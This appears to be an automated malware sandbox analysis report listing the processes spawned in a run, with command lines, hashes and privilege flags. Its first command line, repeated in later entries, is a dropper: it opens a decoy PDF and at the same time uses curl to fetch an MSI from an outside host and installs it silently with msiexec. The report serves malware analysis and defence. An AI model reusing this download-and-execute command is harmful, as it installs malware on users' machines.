                                                                                                                                                                                                                                                            Data Ascii: [{"age":59761,"body":{"elapsed_time":3202,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"13.107.6.158","status_code":401,"type":"http.error"},"type":"network-error","url":"https://business.bin
                                                                                                                                                                                                                                                            2025-03-07 20:41:17 UTC334INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                            Server: Kestrel
                                                                                                                                                                                                                                                            Date: Fri, 07 Mar 2025 20:41:17 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            PMUSER_FORMAT_QS:
                                                                                                                                                                                                                                                            X-CDN-TraceId: 0.37b22817.1741380077.2b2e24e3
                                                                                                                                                                                                                                                            Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                            Access-Control-Allow-Credentials: false
                                                                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *


                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                                                                            Start time:15:39:59
                                                                                                                                                                                                                                                            Start date:07/03/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /k start msedge https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf & curl -sLo C:\Users\user\AppData\Local\Temp\bosfortuy.ms http://559236.na3.to/gift/setup4391.msi & msiexec /i C:\Users\user\AppData\Local\Temp\bosfortuy.ms /qn | Taskkill /f /im cmd.exe
                                                                                                                                                                                                                                                            Imagebase:0x7ff6b0e60000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                                                            Start time:15:40:00
                                                                                                                                                                                                                                                            Start date:07/03/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff68dae0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                                                            Start time:15:40:01
                                                                                                                                                                                                                                                            Start date:07/03/2025
                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf
                                                                                                                                                                                                                                                            Imagebase:0x7ff664de0000
                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                            MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                                                                            Start time:15:40:01
                                                                                                                                                                                                                                                            Start date:07/03/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:curl -sLo C:\Users\user\AppData\Local\Temp\bosfortuy.ms http://559236.na3.to/gift/setup4391.msi
                                                                                                                                                                                                                                                            Imagebase:0x7ff7182d0000
                                                                                                                                                                                                                                                            File size:530'944 bytes
                                                                                                                                                                                                                                                            MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                                                                            Start time:15:40:02
                                                                                                                                                                                                                                                            Start date:07/03/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:msiexec /i C:\Users\user\AppData\Local\Temp\bosfortuy.ms /qn
                                                                                                                                                                                                                                                            Imagebase:0x7ff7db580000
                                                                                                                                                                                                                                                            File size:69'632 bytes
                                                                                                                                                                                                                                                            MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                                                                            Start time:15:40:03
                                                                                                                                                                                                                                                            Start date:07/03/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:Taskkill /f /im cmd.exe
                                                                                                                                                                                                                                                            Imagebase:0x7ff7e7210000
                                                                                                                                                                                                                                                            File size:101'376 bytes
                                                                                                                                                                                                                                                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                                                                            Start time:15:40:03
                                                                                                                                                                                                                                                            Start date:07/03/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                            Imagebase:0x7ff7db580000
                                                                                                                                                                                                                                                            File size:69'632 bytes
                                                                                                                                                                                                                                                            MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                                                                            Start time:15:40:05
                                                                                                                                                                                                                                                            Start date:07/03/2025
                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=2088,i,11631974867291312252,14733990971221578511,262144 /prefetch:3
                                                                                                                                                                                                                                                            Imagebase:0x7ff664de0000
                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                            MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                                                                            Start time:15:40:05
                                                                                                                                                                                                                                                            Start date:07/03/2025
                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf
                                                                                                                                                                                                                                                            Imagebase:0x7ff664de0000
                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                            MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                                                                            Start time:15:40:05
                                                                                                                                                                                                                                                            Start date:07/03/2025
                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2236 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:3
                                                                                                                                                                                                                                                            Imagebase:0x7ff664de0000
                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                            MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                                                                            Start time:15:40:10
                                                                                                                                                                                                                                                            Start date:07/03/2025
                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6272 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8
                                                                                                                                                                                                                                                            Imagebase:0x7ff664de0000
                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                            MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                                                                            Start time:15:40:10
                                                                                                                                                                                                                                                            Start date:07/03/2025
                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6496 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8
                                                                                                                                                                                                                                                            Imagebase:0x7ff664de0000
                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                            MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                                                                                            Start time:15:40:11
                                                                                                                                                                                                                                                            Start date:07/03/2025
                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8
                                                                                                                                                                                                                                                            Imagebase:0x7ff79b3c0000
                                                                                                                                                                                                                                                            File size:1'255'976 bytes
                                                                                                                                                                                                                                                            MD5 hash:F8CEC3E43A6305AC9BA3700131594306
                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                                                                            Start time:15:40:11
                                                                                                                                                                                                                                                            Start date:07/03/2025
                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8
                                                                                                                                                                                                                                                            Imagebase:0x7ff79b3c0000
                                                                                                                                                                                                                                                            File size:1'255'976 bytes
                                                                                                                                                                                                                                                            MD5 hash:F8CEC3E43A6305AC9BA3700131594306
                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                                                                                            Start time:15:40:13
                                                                                                                                                                                                                                                            Start date:07/03/2025
                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=7416 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:6
                                                                                                                                                                                                                                                            Imagebase:0x7ff664de0000
                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                            MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                                                                                            Start time:15:41:06
                                                                                                                                                                                                                                                            Start date:07/03/2025
                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6460 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8
                                                                                                                                                                                                                                                            Imagebase:0x7ff664de0000
                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                            MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            No disassembly